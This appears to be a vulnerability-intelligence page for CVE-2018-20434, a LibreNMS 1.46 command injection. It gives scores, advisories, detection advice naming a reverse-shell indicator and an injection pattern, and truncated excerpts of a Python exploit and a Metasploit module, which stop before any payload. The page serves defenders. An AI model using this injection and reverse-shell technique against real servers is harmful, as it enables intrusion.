CVE-2018-20434
published 2019-04-24CVE-2018-20434: LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the $_POST['community'] parameter to html/pages/addhost.inc.php during creation…
PriorityP181critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
71.49%
99.3th percentile
LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the $_POST['community'] parameter to html/pages/addhost.inc.php during creation of a new device, and then making a /ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost request that triggers html/includes/output/capture.inc.php command mishandling.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| librenms | librenms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests to /addhost containing shell metacharacters (single quotes, $(), backticks, semicolons) in the 'community' parameter, which is the injection point for this CVE. ↗
- →Alert on GET requests to /ajax_output.php with query parameters id=capture, format=text, type=snmpwalk immediately following a suspicious POST to /addhost — this two-stage request sequence is the exploitation pattern. ↗
- →Detect creation of /tmp/f as a named pipe (mkfifo) on the LibreNMS host, which is a strong indicator of the reverse shell payload being executed. ↗
- →The exploit requires prior authentication; look for login attempts followed immediately by POST /addhost and GET /ajax_output.php from the same source IP as a correlated attack chain. ↗
- →The Metasploit module uses a randomly generated 6–12 character alpha hostname for the injected device; alert on device additions with random-looking hostnames paired with community strings containing shell injection patterns. ↗
- →The community parameter payload pattern to detect is a leading single-quote followed by a shell command and a trailing comment character (#), e.g. '; <cmd>#' ↗
- ·Exploitation requires valid authenticated credentials to LibreNMS; unauthenticated exploitation is not possible for this CVE. ↗
- ·The vulnerable version is specifically LibreNMS 1.46; confirm the deployed version before applying detections to avoid false positives on patched instances. ↗
- ·The Metasploit module attempts to clean up by deleting the injected device via POST /delhost after exploitation; forensic artefacts of the device addition may be short-lived in the LibreNMS database. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
LibreNMS arbitrary OS commands execution
ghsa·2022-05-24
CVE-2018-20434 [CRITICAL] CWE-78 LibreNMS arbitrary OS commands execution
LibreNMS arbitrary OS commands execution
LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the `$_POST['community']` parameter to `html/pages/addhost.inc.php` during creation of a new device, and then making a `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost request that triggers html/includes/output/capture.inc.php` command mishandling.
OSV
LibreNMS arbitrary OS commands execution
osv·2022-05-24
CVE-2018-20434 [CRITICAL] LibreNMS arbitrary OS commands execution
LibreNMS arbitrary OS commands execution
LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the `$_POST['community']` parameter to `html/pages/addhost.inc.php` during creation of a new device, and then making a `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost request that triggers html/includes/output/capture.inc.php` command mishandling.
No detection rules found.
Exploit-DB
LibreNMS 1.46 - 'addhost' Remote Code Execution
exploitdb·2019-06-28·CVSS 9.8
CVE-2018-20434 [CRITICAL] LibreNMS 1.46 - 'addhost' Remote Code Execution
LibreNMS 1.46 - 'addhost' Remote Code Execution
---
#!/usr/bin/python
'''
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
# Date: 24/12/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-20434
# Vendor Homepage: https://www.librenms.org/
# Version: v1.46
# Tested on: Ubuntu 18.04 / PHP 7.2.10
'''
import requests
from urllib import urlencode
import sys
if len(sys.argv) != 5:
print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
sys.exit(0)
# target (user input)
target = sys.argv[1]
# cookies (user input)
raw_cookies = sys.argv[2]
# remote host to connect to
rhost = sys.argv[3]
# remote port to connect to
rport = sys.argv[4]
# hostname to use (change it if you want)
hostname = "dummydevice"
# payload to create reverse shell
pa
Exploit-DB
LibreNMS - addhost Command Injection (Metasploit)
exploitdb·2019-06-05
CVE-2018-20434 LibreNMS - addhost Command Injection (Metasploit)
LibreNMS - addhost Command Injection (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'LibreNMS addhost Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in the open source
network management software known as LibreNMS. The community parameter used
in a POST request to the addhost functionality is unsanitized. This parameter
is later used as part of a shell command that gets passed to the popen function
in capture.inc.php, which can result in execution of arbitrary code.
This module requires authentication to LibreNMS first.
),
'License' => MSF_LICENSE,
'Author' =>
[
'mhaskar', # Vulnerability discovery and PoC
'S
Metasploit
LibreNMS addhost Command Injection
metasploit
LibreNMS addhost Command Injection
LibreNMS addhost Command Injection
This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code. This module requires authentication to LibreNMS first.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/153188/LibreNMS-addhost-Command-Injection.htmlhttp://packetstormsecurity.com/files/153448/LibreNMS-1.46-addhost-Remote-Code-Execution.htmlhttps://drive.google.com/file/d/1LcGmOY8x-TG-wnNr-cM_f854kxk0etva/view?usp=sharinghttps://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372dhttps://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/http://packetstormsecurity.com/files/153188/LibreNMS-addhost-Command-Injection.htmlhttp://packetstormsecurity.com/files/153448/LibreNMS-1.46-addhost-Remote-Code-Execution.htmlhttps://drive.google.com/file/d/1LcGmOY8x-TG-wnNr-cM_f854kxk0etva/view?usp=sharinghttps://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372dhttps://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/
2019-04-24
Published